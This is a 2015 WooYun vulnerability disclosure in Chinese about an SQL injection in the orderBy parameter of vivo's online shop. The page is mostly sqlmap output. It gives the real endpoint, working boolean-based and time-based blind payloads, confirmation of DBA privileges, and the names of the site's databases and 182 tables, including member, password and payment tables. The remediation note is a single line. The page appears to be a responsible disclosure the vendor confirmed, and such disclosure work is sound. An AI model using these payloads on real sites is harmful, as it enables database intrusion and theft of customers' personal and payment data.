当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0130324

漏洞标题:手机行业安全之vivo智能手机某站SQL注入(DBA权限)

相关厂商:vivo智能手机

漏洞作者: 路人甲

提交时间:2015-07-29 22:52

修复时间:2015-09-16 11:34

公开时间:2015-09-16 11:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-29: 细节已通知厂商并且等待厂商处理中
2015-08-02: 厂商已经确认,细节仅向厂商公开
2015-08-12: 细节向核心白帽子及相关领域专家公开
2015-08-22: 细节向普通白帽子公开
2015-09-01: 细节向实习白帽子公开
2015-09-16: 细节向公众公开

简要描述:

RT

详细说明:

http://shop.vivo.com.cn/gallery-ajax_get_goods.html
post参数:
cat_id=&orderBy=*&scontent=n,e&showtype=grid&&virtual_cat_id=
orderBy参数存在注入


漏洞证明:

sqlmap identified the following injection points with a total of 522 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: cat_id=&orderBy=(SELECT (CASE WHEN (2977=2977) THEN 2977 ELSE 2977*(SELECT 2977 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&scontent=n,e&showtype=grid&&virtual_cat_id=
Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: cat_id=&orderBy=(SELECT (CASE WHEN (3089=3089) THEN SLEEP(5) ELSE 3089*(SELECT 3089 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&scontent=n,e&showtype=grid&&virtual_cat_id=
Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
---
web application technology: Nginx, PHP 5.3.25
back-end DBMS: MySQL 5.0
current user: 'vivo@192.168.1.%'
current database: 'vivo_store'
current user is DBA: True
available databases [8]:
[*] cacti
[*] information_schema
[*] mysql
[*] performance_schema
[*] seckill
[*] test
[*] vivo04e9
[*] vivo_chk
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: cat_id=&orderBy=(SELECT (CASE WHEN (2977=2977) THEN 2977 ELSE 2977*(SELECT 2977 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&scontent=n,e&showtype=grid&&virtual_cat_id=
Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: cat_id=&orderBy=(SELECT (CASE WHEN (3089=3089) THEN SLEEP(5) ELSE 3089*(SELECT 3089 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&scontent=n,e&showtype=grid&&virtual_cat_id=
Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
---
web application technology: Nginx, PHP 5.3.25
back-end DBMS: MySQL 5.0
Database: vivo_store
[182 tables]
+-----------------------------------------+
| sdb_aftersales_return_product |
| sdb_apiactionlog_apilog |
| sdb_b2c_archive_orders |
| sdb_b2c_brand |
| sdb_b2c_cart |
| sdb_b2c_cart_objects |
| sdb_b2c_college |
| sdb_b2c_comment_goods_point |
| sdb_b2c_comment_goods_type |
| sdb_b2c_contract_package |
| sdb_b2c_contract_package_numbers |
| sdb_b2c_counter |
| sdb_b2c_counter_attach |
| sdb_b2c_coupon_map |
| sdb_b2c_coupon_vivo |
| sdb_b2c_coupon_vivo_info |
| sdb_b2c_coupon_vivo_list |
| sdb_b2c_coupon_vivo_xshot |
| sdb_b2c_coupons |
| sdb_b2c_delivery |
| sdb_b2c_delivery_items |
| sdb_b2c_dly_h_area |
| sdb_b2c_dlycorp |
| sdb_b2c_dlytype |
| sdb_b2c_flashlottery_award |
| sdb_b2c_flashlottery_log |
| sdb_b2c_flashlottery_winner |
| sdb_b2c_goods |
| sdb_b2c_goods_cat |
| sdb_b2c_goods_contract_package |
| sdb_b2c_goods_keywords |
| sdb_b2c_goods_lv_price |
| sdb_b2c_goods_promotion_ref |
| sdb_b2c_goods_question |
| sdb_b2c_goods_rate |
| sdb_b2c_goods_spec_index |
| sdb_b2c_goods_store_prompt |
| sdb_b2c_goods_type |
| sdb_b2c_goods_type_props |
| sdb_b2c_goods_type_props_value |
| sdb_b2c_goods_type_spec |
| sdb_b2c_goods_virtual_cat |
| sdb_b2c_lottery_award |
| sdb_b2c_lottery_log |
| sdb_b2c_lottery_winner |
| sdb_b2c_member_addrs |
| sdb_b2c_member_advance |
| sdb_b2c_member_college |
| sdb_b2c_member_comments |
| sdb_b2c_member_coupon |
| sdb_b2c_member_goods |
| sdb_b2c_member_limit_ip |
| sdb_b2c_member_lv |
| sdb_b2c_member_msg |
| sdb_b2c_member_point |
| sdb_b2c_member_pwdlog |
| sdb_b2c_member_secret |
| sdb_b2c_member_share_history |
| sdb_b2c_member_systmpl |
| sdb_b2c_members |
| sdb_b2c_order_coupon_user |
| sdb_b2c_order_delivery |
| sdb_b2c_order_items |
| sdb_b2c_order_log |
| sdb_b2c_order_objects |
| sdb_b2c_order_pmt |
| sdb_b2c_orders |
| sdb_b2c_preorders_sales_rule |
| sdb_b2c_products |
| sdb_b2c_reship |
| sdb_b2c_reship_items |
| sdb_b2c_sales_rule_goods |
| sdb_b2c_sales_rule_order |
| sdb_b2c_sell_logs |
| sdb_b2c_shop |
| sdb_b2c_spec_values |
| sdb_b2c_specification |
| sdb_b2c_type_brand |
| sdb_b2c_xfive_coupon_log |
| sdb_b2c_xfiveblue_preorder |
| sdb_b2c_xfivepro_preorder |
| sdb_base_app_content |
| sdb_base_apps |
| sdb_base_cache_expires |
| sdb_base_crontab |
| sdb_base_files |
| sdb_base_kvstore |
| sdb_base_network |
| sdb_base_queue |
| sdb_base_rpcnotify |
| sdb_base_rpcpoll |
| sdb_base_syscache_resources |
| sdb_content_article_bodys |
| sdb_content_article_indexs |
| sdb_content_article_nodes |
| sdb_couponlog_order_coupon_ref |
| sdb_couponlog_order_coupon_user |
| sdb_dbeav_meta_register |
| sdb_dbeav_meta_value_datetime |
| sdb_dbeav_meta_value_decimal |
| sdb_dbeav_meta_value_int |
| sdb_dbeav_meta_value_longtext |
| sdb_dbeav_meta_value_text |
| sdb_dbeav_meta_value_varchar |
| sdb_dbeav_recycle |
| sdb_desktop_filter |
| sdb_desktop_flow |
| sdb_desktop_hasrole |
| sdb_desktop_menus |
| sdb_desktop_recycle |
| sdb_desktop_role_flow |
| sdb_desktop_roles |
| sdb_desktop_tag |
| sdb_desktop_tag_rel |
| sdb_desktop_user_flow |
| sdb_desktop_users |
| sdb_ectools_analysis |
| sdb_ectools_analysis_logs |
| sdb_ectools_currency |
| sdb_ectools_order_bills |
| sdb_ectools_payments |
| sdb_ectools_payments_log_callback |
| sdb_ectools_payments_log_request |
| sdb_ectools_refunds |
| sdb_ectools_regions |
| sdb_express_dly_center |
| sdb_express_print_tmpl |
| sdb_gift_cat |
| sdb_gift_ref |
| sdb_image_image |
| sdb_image_image_attach |
| sdb_importexport_task |
| sdb_logisticstrack_logistic_log |
| sdb_operatorlog_logs |
| sdb_operatorlog_normallogs |
| sdb_operatorlog_register |
| sdb_pam_account |
| sdb_pam_auth |
| sdb_pam_bind_tag |
| sdb_pam_log |
| sdb_pointprofessional_member_point_task |
| sdb_preorderlog_order_preorder_user |
| sdb_site_activities_survey |
| sdb_site_activities_xfivepro |
| sdb_site_explorers |
| sdb_site_index_page |
| sdb_site_link |
| sdb_site_lucky_draw |
| sdb_site_menus |
| sdb_site_modules |
| sdb_site_purchase |
| sdb_site_route_statics |
| sdb_site_seo |
| sdb_site_themes |
| sdb_site_themes_file |
| sdb_site_themes_tmpl |
| sdb_site_widgets |
| sdb_site_widgets_instance |
| sdb_site_widgets_proinstance |
| sdb_system_matrixset |
| sdb_system_queue_mysql |
| sdb_timedbuy_objitems |
| sdb_upimage_upimage |
| sdb_wap_explorers |
| sdb_wap_menus |
| sdb_wap_modules |
| sdb_wap_seo |
| sdb_wap_themes |
| sdb_wap_themes_file |
| sdb_wap_themes_tmpl |
| sdb_wap_widgets |
| sdb_wap_widgets_instance |
| sdb_weixin_alert |
| sdb_weixin_bind |
| sdb_weixin_menus |
| sdb_weixin_message |
| sdb_weixin_message_image |
| sdb_weixin_message_text |
| sdb_weixin_safeguard |
| tmp_53aa3e378d690 |
| tmp_53bbb6d760ad5 |
| tmp_53bbc08212460 |
+-----------------------------------------+

修复方案:

参数过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-08-02 11:33

厂商回复:

感谢关注

最新状态:

暂无


漏洞评价:

评论